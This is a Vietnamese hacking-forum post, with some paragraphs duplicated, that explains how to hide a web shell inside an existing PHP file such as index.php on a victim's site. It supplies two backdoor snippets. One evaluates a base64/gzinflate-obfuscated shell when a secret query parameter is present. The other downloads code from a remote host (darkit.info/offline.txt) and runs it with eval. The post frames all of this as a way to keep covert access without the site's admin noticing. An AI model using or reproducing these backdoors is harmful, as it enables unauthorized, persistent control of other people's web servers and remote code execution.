Ở tít này thì mình muốn đề cập đến phương pháp ẩn shell trong web của victim.?
Giả thiết đặt ra. Chúng ta có 1 shell trên abc.com
Mục tiêu của mình sẽ là chèn con shell vào 1 file php khác trên web.
Ví dụ index.php
Khi mọi người và thằng admin truy cập abc.com/index.php. Thì mọi việc diễn ra bt.
Nhưng khi mình truy cập. abc.com/index.php?do=shellname thì sẽ mở ra cho mình vào shell ngay trên file index.php .
Demo
Giả thiết đặt ra. Chúng ta có 1 shell trên abc.com
Mục tiêu của mình sẽ là chèn con shell vào 1 file php khác trên web.
Ví dụ index.php
Khi mọi người và thằng admin truy cập abc.com/index.php. Thì mọi việc diễn ra bt.
Nhưng khi mình truy cập. abc.com/index.php?do=shellname thì sẽ mở ra cho mình vào shell ngay trên file index.php .
Demo
Ví dụ trên đc test trên vbb.
Nếu ai có cách riêng bí quyết hay để ẩn shell thì có thể chia sẻ để mọi người cùng thảo luận và chặt chém xD
Thảo luận nào a e
===============================
Cách làm của Black.
Mở 1 file bất kỳ. Chèn vào đó nội dung như sau
Nếu ai có cách riêng bí quyết hay để ẩn shell thì có thể chia sẻ để mọi người cùng thảo luận và chặt chém xD
Thảo luận nào a e
===============================
Cách làm của Black.
Mở 1 file bất kỳ. Chèn vào đó nội dung như sau
if (isset($_GET['y']))
{
eval(gzinflate(base64_decode('Code shell')))
exit;
}
Run shell xxx.php?y
Có thể thay y bằng các ký tự khác
Lưu ý. Code shell phải đc mã hóa gzinflate
Có thể thay y bằng các ký tự khác
Lưu ý. Code shell phải đc mã hóa gzinflate
Cũng như trên như ng nội dung khác như sau:
if($_REQUEST['do'] == ”Hades”){
$data = @file_get_contents(“http://darkit.info/offline.txt“);
$data = str_replace(“<?php”, ”", $data);
$data = str_replace(“?>”, ”", $data);
eval($data);
die();
trong đó dòng http://darkit.info/offline.txt là địa chỉ file shell được đặt trong file offline.txt(để ở dạng txt là good nhất:D)
Nguồn: darkit.info
Nguồn: darkit.info
